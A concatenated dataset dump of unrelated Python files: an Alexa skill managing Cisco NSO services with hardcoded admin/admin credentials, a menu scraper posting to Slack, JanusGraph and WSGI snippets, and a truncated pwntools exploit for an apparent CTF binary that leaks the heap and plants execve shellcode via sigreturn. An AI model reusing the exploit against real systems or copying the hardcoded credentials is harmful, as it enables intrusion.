sddevactivelicense_count()\nprint(x)\n\n\n##############################################################################################################################\n\ndef get_random_config():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO ?\"\n ]\n return random.choice(questions)\n\ndef get_random_configure():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO ?\"\n ]\n return random.choice(questions)\n\ndef get_random_configs():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO?\"\n ]\n return random.choice(questions)\n \ndef get_random_configsz():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \" \"\n ]\n return random.choice(questions) \n \ndef get_random_configz():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"\"\n ]\n return random.choice(questions)\n \ndef service_info():\n import requests\n import time\n import json \n code= requests.get(\"http://203.122.19.100:6661/api/operational/services\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:services']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running services are\" ,items\n \ndef delete_service(request):\n import requests\n import time\n import json\n code= requests.get(\"http://203.122.19.100:6661/api/operational/services\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:services']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n value = items\n slot_values = request.intent.slots[\"delete_service\"].value\n for ext in value:\n if ext in slot_values:\n 
requests.delete(\"http://203.122.19.100:6661/api/running/services/l2vpn1/{}\".format(slot_values) ,auth=(\"admin\",\"admin\"))\n return (\"Service has been deleted\")\n else :\n return (\"Service name is not found ............ please try again\")\n \ndef service_create(request):\n import requests\n import time\n import json\n import collections\n slot_device = request.intent.slots[\"device_name\"].value\n slot_de = slot_device.upper()\n slot_dev = request.intent.slots[\"device_no\"].value\n slot_d = slot_dev.upper()\n slot_value = request.intent.slots[\"Service_name\"].value\n slot_val = request.intent.slots['pw_id'].value\n slot_loopback = request.intent.slots[\"loopback_ip\"].value\n slot_interface = request.intent.slots['interface_number'].value\n slot_interfac = slot_interface.replace(' ', '/')\n slot_interf = request.intent.slots['interface_no'].value\n slot_inte = slot_interf.replace(' ','/')\n slot_remote = request.intent.slots['ip_address'].value\n \n payload = {\n \"l2vpn1:l2vpn1\": {\n \"name\": slot_value,\n \"pw-id\": slot_val,\n \"link\": [\n {\n \"device\": slot_de,\n \"ios\": {\n \"intf-number\": str(slot_interfac)\n },\n \"remote-ip\": str(slot_remote)\n },\n {\n \"device\": slot_d,\n \"iosxr\": {\n \"intf-number\": str(slot_inte)\n },\n \"remote-ip\": str(slot_loopback)\n }\n ]\n }\n }\n code = requests.post(\"http://203.122.19.100:6661/api/running/services/\",headers={\"Content-Type\": \"application/vnd.yang.data+json\"}, auth=(\"admin\",\"admin\"), data=json.dumps(payload))\n code = requests.post(\"http://203.122.19.100:6661/api/running/services/\",headers={\"Content-Type\": \"application/vnd.yang.data+json\"}, auth=(\"admin\",\"admin\"), json=payload)\n cod= requests.get(\"http://203.122.19.100:6661/api/running/services/l2vpn1/\",headers={\"Accept\": \"application/vnd.yang.collection+json\"},auth=(\"admin\",\"admin\"))\n y = cod.json()\n w=y['collection']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['pw-id'])\n if any(list == slot_val for list in items): \n return \"Pw-id has been already exist..... Please try again\"\n elif (code.status_code == 400):\n return \"Service is not created... Please try again\"\n else :\n return \"Service has been created\"\n \ndef device_info():\n import requests\n import time\n import json \n code= requests.get(\"http://203.122.19.100:6661/api/operational/devices\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:devices']\n m=w['device']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running devices are\",items\n\ndef get_random_goodbye():\n \"\"\"Return random goodbye message.\"\"\"\n # type: () -> str\n goodbyes = [\"OK. 
Goodbye!\", \"Have a great day!\", \"Come back again soon!\"]\n return random.choice(goodbyes)\n\ndef get_speakable_list_of_products(entitled_products_list):\n \"\"\"Return product list in speakable form.\"\"\"\n # type: (List[InSkillProduct]) -> str\n product_names = [item.name for item in entitled_products_list]\n if len(product_names) > 1:\n # If more than one, add and 'and' in the end\n speech = \" and \".join(\n [\", \".join(product_names[:-1]), product_names[-1]])\n else:\n # If one or none, then return the list content in a string\n speech = \", \".join(product_names)\n return speech\n\ndef get_resolved_value(request, slot_name):\n \"\"\"Resolve the slot name from the request using resolutions.\"\"\"\n # type: (IntentRequest, str) -> Union[str, None]\n try:\n return (request.intent.slots[slot_name].resolutions.resolutions_per_authority[0].values[0].value.name)\n except (AttributeError, ValueError, KeyError, IndexError):\n return None\n\ndef get_spoken_value(request, slot_name):\n \"\"\"Resolve the slot to the spoken value.\"\"\"\n # type: (IntentRequest, str) -> Union[str, None]\n try:\n return request.intent.slots[slot_name].value\n except (AttributeError, ValueError, KeyError, IndexError):\n return None\n\ndef in_skill_product_response(handler_input):\n \"\"\"Get the In-skill product response from monetization service.\"\"\"\n # type: (HandlerInput) -> Union[InSkillProductsResponse, Error]\n locale = handler_input.request_envelope.request.locale\n ms = handler_input.service_client_factory.get_monetization_service()\n return ms.get_in_skill_products(locale)\n\n# Skill Handlers\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Launch Requests.\n\n The handler gets the in-skill products for the user, and provides\n a custom welcome message depending on the ownership of the products\n to the user.\n User says: Alexa, open .\n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n\n in_skill_response = in_skill_product_response(handler_input)\n if isinstance(in_skill_response, InSkillProductsResponse):\n entitled_prods = get_all_entitled_products(in_skill_response.in_skill_products)\n if entitled_prods:\n speech = (\n \"Welcome to {}. You currently own {} products. \"\n \"To hear a random fact, you could say, 'Tell me a fact', \"\n \"or you can ask for a specific category you have \"\n \"purchased, for example, say 'Tell me a science fact'. \"\n \"To know what else you can buy, say, 'What can i buy?'. \"\n \"So, what can I help you with?\").format(skill_name,get_speakable_list_of_products(entitled_prods))\n else:\n logger.info(\"No entitled products\")\n speech = (\n \"Hello.......Welcome to InfinityLabs.... A Technology \"\n \"consulting and Software Solutions Company. Providing\"\n \"expert IT services in the areas of Automation,\"\n \"Network Design and Deployment, IT Security,\"\n \"Data Centre Management, Cloud computing,\"\n \"Virtualization, machine learning and analytic,.....\"\n \"What would you want me to help you with today ?\"\n ).format(skill_name)\n reprompt = \"I didn't catch that. 
What can I help you with?\"\n else:\n logger.info(\"Error calling InSkillProducts API: {}\".format(in_skill_response.message))\n speech = \"Something went wrong in loading your purchase history.\"\n reprompt = speech\n\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\n\nclass WelcomeIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"WelcomeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"WelcomeIntentHandler\")\n fact_rest = welcome_script()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass YesHandler(AbstractRequestHandler):\n \"\"\"If the user says Yes, they want another fact.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"AMAZON.YesIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In YesHandler\")\n fact_text = get_random_from_list(all_facts)\n fact_rest = check_status()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_yes_no_question())).ask(get_random_yes_no_question()).response\n \n\nclass NoHandler(AbstractRequestHandler):\n \"\"\"If the user says No, then the skill should be exited.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"AMAZON.NoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In NoHandler\")\n return handler_input.response_builder.speak(get_random_goodbye()).set_should_end_session(True).response\n\n\nclass RouterinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"RouterinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In RouterinformationHandler\")\n fact_rest = package_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \n\nclass ServicesinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"ServicesinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In ServicesinformationHandler\")\n fact_rest = service_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n\n\nclass CreateserviceHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"CreateserviceIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CreateserviceHandler\")\n fact_rest = create_service()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configz())).ask(get_random_configz()).response\n\n\nclass DeviceinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"DeviceinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In 
DeviceinformationHandler\")\n fact_rest = device_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n\n \nclass CancelSubscriptionHandler(AbstractRequestHandler):\n \"\"\"\n Following handler demonstrates how Skills would receive Cancel requests\n from customers and then trigger a cancel request to Alexa\n User says: Alexa, ask premium facts to cancel \n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"CancelSubscriptionIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CancelSubscriptionHandler\")\n\n in_skill_response = in_skill_product_response(handler_input)\n if in_skill_response:\n product_category = get_resolved_value(handler_input.request_envelope.request, \"productCategory\")\n\n # No entity resolution match\n if product_category is None:\n product_category = \"all_access\"\n else:\n product_category += \"_pack\"\n\n product = [l for l in in_skill_response.in_skill_products\n if l.reference_name == product_category]\n return handler_input.response_builder.add_directive(\n SendRequestDirective(\n name=\"Cancel\",\n payload={\n \"InSkillProduct\": {\n \"productId\": product[0].product_id\n }\n },\n token=\"correlationToken\")\n ).response\n\n\nclass BuyResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the Connections.Response event after a buy occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Buy\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In BuyResponseHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n product_id = handler_input.request_envelope.request.payload.get(\"productId\")\n\n if in_skill_response:\n product = [l for l in in_skill_response.in_skill_products\n if l.product_id == product_id]\n logger.info(\"Product = {}\".format(str(product)))\n if handler_input.request_envelope.request.status.code == \"200\":\n speech = None\n reprompt = None\n purchase_result = handler_input.request_envelope.request.payload.get(\n \"purchaseResult\")\n if purchase_result == PurchaseResult.ACCEPTED.value:\n category_facts = all_facts\n if product[0].reference_name != \"all_access\":\n category_facts = [l for l in all_facts if\n l.get(\"type\") ==\n product[0].reference_name.replace(\n \"_pack\", \"\")]\n speech = (\"You have unlocked the {}. Here is your {} \"\n \"fact: {} {}\").format(\n product[0].name,\n product[0].reference_name.replace(\n \"_pack\", \"\").replace(\"all_access\", \"\"),\n get_random_from_list(category_facts),\n get_random_yes_no_question())\n reprompt = get_random_yes_no_question()\n elif purchase_result in (\n PurchaseResult.DECLINED.value,\n PurchaseResult.ERROR.value,\n PurchaseResult.NOT_ENTITLED.value):\n speech = (\"Thanks for your interest in {}. 
\"\n \"Would you like another random fact?\".format(\n product[0].name))\n reprompt = \"Would you like another random fact?\"\n elif purchase_result == PurchaseResult.ALREADY_PURCHASED.value:\n logger.info(\"Already purchased product\")\n speech = \" Do you want to hear a fact?\"\n reprompt = \"What can I help you with?\"\n else:\n # Invalid purchase result value\n logger.info(\"Purchase result: {}\".format(purchase_result))\n return FallbackIntentHandler().handle(handler_input)\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n\n return handler_input.response_builder.speak(\n \"There was an error handling your purchase request. \"\n \"Please try again or contact us for help\").response\n\n\n########################################\n################SDDEV CLASS#############\n########################################\n\n\nclass SddevdeviceinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevdeviceinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevdeviceinfoIntentHandler\")\n fact_rest = sddevdevice_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\n\n\nclass SddevsitesinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevsitesinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevsitesinfoIntentHandler\")\n fact_rest = sddevsites_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass SddevpidinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevpidinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevpidinfoIntentHandler\")\n fact_rest = sddevpid_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass SddevuserinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevuserinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevuserinfoIntentHandler\")\n fact_rest = sddevuser_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\n\nclass SddevactivelicenseinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevactivelicenseinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevactivelicenseinfoIntentHandler\")\n fact_rest = sddevactivelicense_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\nclass CancelResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the 
Connections.Response event after a cancel occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Cancel\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CancelResponseHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n product_id = handler_input.request_envelope.request.payload.get(\n \"productId\")\n\n if in_skill_response:\n product = [l for l in in_skill_response.in_skill_products\n if l.product_id == product_id]\n logger.info(\"Product = {}\".format(str(product)))\n if handler_input.request_envelope.request.status.code == \"200\":\n speech = None\n reprompt = None\n purchase_result = handler_input.request_envelope.request.payload.get(\n \"purchaseResult\")\n purchasable = product[0].purchasable\n if purchase_result == PurchaseResult.ACCEPTED.value:\n speech = (\"You have successfully cancelled your \"\n \"subscription. {}\".format(\n get_random_yes_no_question()))\n reprompt = get_random_yes_no_question()\n\n if purchase_result == PurchaseResult.DECLINED.value:\n if purchasable == PurchasableState.PURCHASABLE:\n speech = (\"You don't currently have a \"\n \"subscription. {}\".format(\n get_random_yes_no_question()))\n else:\n speech = get_random_yes_no_question()\n reprompt = get_random_yes_no_question()\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n\n return handler_input.response_builder.speak(\n \"There was an error handling your cancellation \"\n \"request. Please try again or contact us for \"\n \"help\").response\n \n \nclass UpsellResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the Connections.Response event after an upsell occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Upsell\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In UpsellResponseHandler\")\n\n if handler_input.request_envelope.request.status.code == \"200\":\n if handler_input.request_envelope.request.payload.get(\n \"purchaseResult\") == PurchaseResult.DECLINED.value:\n speech = (\"Ok. Here's a random fact: {} {}\".format(\n get_random_from_list(all_facts),\n get_random_yes_no_question()))\n reprompt = get_random_yes_no_question()\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n return handler_input.response_builder.speak(\n \"There was an error handling your Upsell request. 
\"\n \"Please try again or contact us for help.\").response\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for help message to users.\"\"\"\n def can_handle(self, handler_input):\n return is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In HelpIntentHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n\n if isinstance(in_skill_response, InSkillProductsResponse):\n speech = (\n \"To hear about NSO you can say \"\n \"'infinity', or to hear about How to create a NSO service using CLI, 'Please follow cisco documents' \"\n )\n reprompt = \"I didn't catch that. What can I help you with?\"\n else:\n logger.info(\"Error calling InSkillProducts API: {}\".format(\n in_skill_response.message))\n speech = \"Something went wrong in loading your purchase history.\"\n reprompt = speech\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\nclass ServiceNameIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"ServiceNameIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In ServiceNameIntentHandler\")\n fact_rest = service_create(handler_input.request_envelope.request)\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \nclass DeleteserviceIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"DeleteserviceIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In DeleteserviceIntentHandler\")\n fact_rest = delete_service(handler_input.request_envelope.request)\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response \n \nclass FallbackIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for fallback intent.\n\n 2018-July-12: AMAZON.FallbackIntent is currently available in all\n English locales. This handler will not be triggered except in that\n locale, so it can be safely deployed for any locale. More info\n on the fallback intent can be found here: https://developer.amazon.com/docs/custom-skills/standard-built-in-intents.html#fallback\n \"\"\"\n def can_handle(self, handler_input):\n return is_intent_name(\"AMAZON.FallbackIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In FallbackIntentHandler\")\n speech = (\n \"Sorry. I cannot help with that.\"\n \"...........\"\n \"To hear about N S O you can say,. 'infinity' \"\n \"............Or say.....\"\n \"'Help me'...... \"\n )\n reprompt = \"I didn't catch that. 
What can I help you with?\"\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n\n\nclass SessionEndedHandler(AbstractRequestHandler):\n \"\"\"Handler for session end request, stop or cancel intents.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"SessionEndedRequest\")(handler_input) or\n is_intent_name(\"AMAZON.StopIntent\")(handler_input) or\n is_intent_name(\"AMAZON.CancelIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SessionEndedHandler\")\n return handler_input.response_builder.speak(\n get_random_goodbye()).set_should_end_session(True).response\n\n# Skill Exception Handler\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"One exception handler to catch all exceptions.\"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, I can't understand the command. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response\n\n# Request and Response Loggers\nclass RequestLogger(AbstractRequestInterceptor):\n \"\"\"Log the request envelope.\"\"\"\n def process(self, handler_input):\n # type: (HandlerInput) -> None\n logger.info(\"Request Envelope: {}\".format(\n handler_input.request_envelope))\n\nclass ResponseLogger(AbstractResponseInterceptor):\n \"\"\"Log the response envelope.\"\"\"\n def process(self, handler_input, response):\n # type: (HandlerInput, Response) -> None\n logger.info(\"Response: {}\".format(response))\n\n\nsb = StandardSkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(YesHandler())\nsb.add_request_handler(NoHandler())\nsb.add_request_handler(RouterinformationHandler())\nsb.add_request_handler(BuyResponseHandler())\nsb.add_request_handler(CancelResponseHandler())\nsb.add_request_handler(UpsellResponseHandler())\nsb.add_request_handler(ServicesinformationHandler())\nsb.add_request_handler(CreateserviceHandler())\nsb.add_request_handler(DeviceinformationHandler())\nsb.add_request_handler(CancelSubscriptionHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(FallbackIntentHandler())\nsb.add_request_handler(SessionEndedHandler())\nsb.add_request_handler(ServiceNameIntentHandler())\nsb.add_request_handler(DeleteserviceIntentHandler())\nsb.add_request_handler(WelcomeIntentHandler())\n\n\n\nsb.add_request_handler(SddevdeviceinfoHandler())\nsb.add_request_handler(SddevsitesinfoHandler())\nsb.add_request_handler(SddevpidinfoHandler())\nsb.add_request_handler(SddevuserinfoHandler())\nsb.add_request_handler(SddevactivelicenseinfoHandler())\n\n\n\nsb.add_exception_handler(CatchAllExceptionHandler())\nsb.add_global_request_interceptor(RequestLogger())\nsb.add_global_response_interceptor(ResponseLogger())\n\nlambda_handler = sb.lambda_handler()","sub_path":"SDDEV-LAMBDA CODE/sddevlambda.py","file_name":"sddevlambda.py","file_ext":"py","file_size_in_byte":39109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"103747870","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport datetime\nfrom MenuChoices import MenuChoices\nfrom GetPage import getpage\nfrom push_poll import PushPoll\nfrom send_slack import 
SendSlack\n\n\n## Get main page of the VnB blog\nsoup_main = getpage(\"http://danielemarcaccini.com/\")\n\n\n## Get today's menu link from the main page\ntoday = datetime.date.today().strftime(\"%d-%m-%Y\")\n## Existing dates for testing :\n#today = \"20-04-2018\"\n#today = \"03-05-2018\"\nlinks = soup_main.find_all('a')\n\nmenu_url = \"\"\nfor link in links:\n if today in link.get('href'):\n menu_url = link.get('href')\n break\n\nif menu_url == \"\":\n print(\"No menu found today.\")\n exit()\n\n\n## Get today's menu page \nsoup_menu_today = getpage(menu_url)\n\n## Get today's menu\ncomplete_menu = [x.string for x in soup_menu_today.find(class_=\"entry-content\").find_all(\"p\")]\n\n## Display menu on stdout\n#print(complete_menu)\n\n\n## Sort the menu from the raw complete menu into a structured format :\n\n## The result is a list, in which each element is a custom class MenuChoices\n## MenuChoices has a Name (string) like \"plat\" or \"entrée\" / a Choice (list) containing today's options\n## /and optional side dishes (list)\n\n\nmenu_today = []\n\nfor line in complete_menu:\n if ':' in line:\n menu = MenuChoices()\n menu.setName(line.split(':', 1)[0])\n contenu = line.split(':', 1)[1]\n if \" e/o \" in contenu:\n menu.setChoice(contenu.split(' / ')[0].split(\" e/o \"))\n else:\n if ' / ' in contenu:\n menu.setChoice(contenu.split(' / ')[0].split(\" ou \"))\n else:\n menu.setChoice([contenu])\n if ' / ' in contenu:\n if \" e/o \" in contenu.split(' / ')[1]:\n menu.setSideDish(contenu.split(' / ')[1].split(\" e/o \"))\n else:\n menu.setSideDish(contenu.split(' / ')[1:])\n\n for choice in menu.getChoices():\n if menu.getSideDish():\n menu_today.append(f\"{menu.getName()} : {choice} + {menu.getSideDish()}\")\n else:\n menu_today.append(f\"{menu.getName()} : {choice}\")\n\n else:\n menu = MenuChoices()\n menu.setName(\"Autres\")\n menu.setChoice([line])\n menu_today.append(f\"{menu.getName()} : {menu.getChoices()}\")\n\n## Displays the menu's content for debug\n#print(\"Elements du Menu : #############\")\n#for i in menu_today:\n# print(i)\n\n## Create survey title\nsurvey_title = f\"\"\"Le menu du VnB du {datetime.date.today().strftime(\"%d-%m-%Y\")}\"\"\"\n\n## Send the VnB menu to push_poll to create the poll\nsurvey_url = PushPoll(menu_today, \"VnB\", survey_title)\n\n## Send the survey url to Slack to notify users\nSendSlack(f\"Voici le <{survey_url} | Nouveau Menu> du jour !\")\n\n","sub_path":"scrap_vnb.py","file_name":"scrap_vnb.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176155966","text":"#add_is_root_property.py\n\nfrom Query import get_list_of_all_vertex_by_label as get_vertex\nfrom GremlinConnect import GremlinConnection\nfrom pprint import pprint\nimport json\n\ndef get_list(traversal, label):\n vertex_list = get_vertex(traversal, label)\n return vertex_list\n\ndef get_janus_graph_traversal(connection_driver):\n print(\"&&& Calling Gremlin Connect &&& \")\n gremlin_traversal= GremlinConnection.traversal_connection(connection_driver)\n print(\"&&& Gremlin is Lived &&& \")\n return gremlin_traversal\n\ndef get_janus_graph_connection_driver():\n host= '192.168.1.195'\n port = '8182'\n driver = GremlinConnection.connection_driver(host,port)\n print(\"&&& Gremlin is Alive &&& \")\n return driver\n\ndef add_is_root_property(traversal,list):\n for vertex in list:\n submission = traversal.V(vertex.id).property(\"is_root\", True).iterate()\n print(\"1 done\")\n print('done')\n\ndef 
main():\n connection_driver = get_janus_graph_connection_driver()\n traversal = get_janus_graph_traversal(connection_driver)\n list = get_list(traversal = traversal, label = 'city')\n add_is_root_property(traversal=traversal, list = list)\n connection_driver.close()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"AddIsRootProperty.py","file_name":"AddIsRootProperty.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"637815450","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom wsgiref.simple_server import make_server\n\ndef application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return '
<html><body>
    Hello, world!
</body></html>
    '\n\nserver = make_server('0.0.0.0', 9090, application)\n\nserver.serve_forever()\n\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172721773","text":"from pwn import *\r\ncontext.update(os='linux', arch='amd64')\r\n\r\ndef __syscall__(p, num, arg):\r\n p.sendlineafter('choice:', '0')\r\n p.sendlineafter('number:', str(num))\r\n p.sendlineafter('argument:', str(arg))\r\n\r\ndef __update__(p, user):\r\n p.sendlineafter('choice:', '1')\r\n p.sendafter('username:', user)\r\n\r\ndef exploit(host, port=20004):\r\n if host:\r\n p = remote(host, port)\r\n else:\r\n p = process('./syscall_interface')\r\n gdb.attach(p)\r\n syscall = lambda n,arg: __syscall__(p, n, arg)\r\n update = lambda usr: __update__(p, usr)\r\n\r\n # sys_personality : make the heap which is allocated later executable\r\n syscall(135, 0x0400000)\r\n # sys_brk : leak the end address of the heap\r\n syscall(12, 0)\r\n p.recvuntil('RET(')\r\n heap = int(p.recvuntil(')', drop=True), 16) - 0x22000\r\n log.info('[heap] '+hex(heap))\r\n\r\n # update username: place partial frame on the stack for rt_sigreturn\r\n sc = asm('''\r\n push 0x3b\r\n pop rax\r\n mov rbx, 0xFF978CD091969DD1\r\n neg rbx\r\n push rbx\r\n push rsp\r\n pop rdi\r\n cdq\r\n push rdx\r\n pop rsi\r\n syscall\r\n ''')\r\n partial_frame = [ # starts from rbp\r\n sc.rjust(0x28, '\\x90'),\r\n heap+0x800, # rsp\r\n heap+0x50, # rip\r\n 0, # eflags\r\n p16(0x33), # cs\r\n p32(0), # gs, fs\r\n 